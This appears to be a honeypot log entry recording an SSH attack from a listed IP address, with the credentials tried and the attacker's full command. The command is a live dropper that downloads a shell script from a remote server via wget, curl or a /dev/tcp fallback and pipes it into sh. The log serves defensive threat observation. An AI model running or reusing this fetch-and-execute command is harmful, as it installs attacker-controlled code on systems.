Time | 2024/07/02, 09:42:19 (GMT) |
Transaction ID | DXXR41ITYR69UJNP |
Service | ssh |
Location | AZ (Azerbaijan) |
Attacker | 164.215.103.47 |
Classification | Web script execution |
Harm Potential | High |
164.215.103.47 client username 'root' and password 'linux@12345' entered
164.215.103.47 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/185.172.128.93/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'
All observations come from the honeypot central database.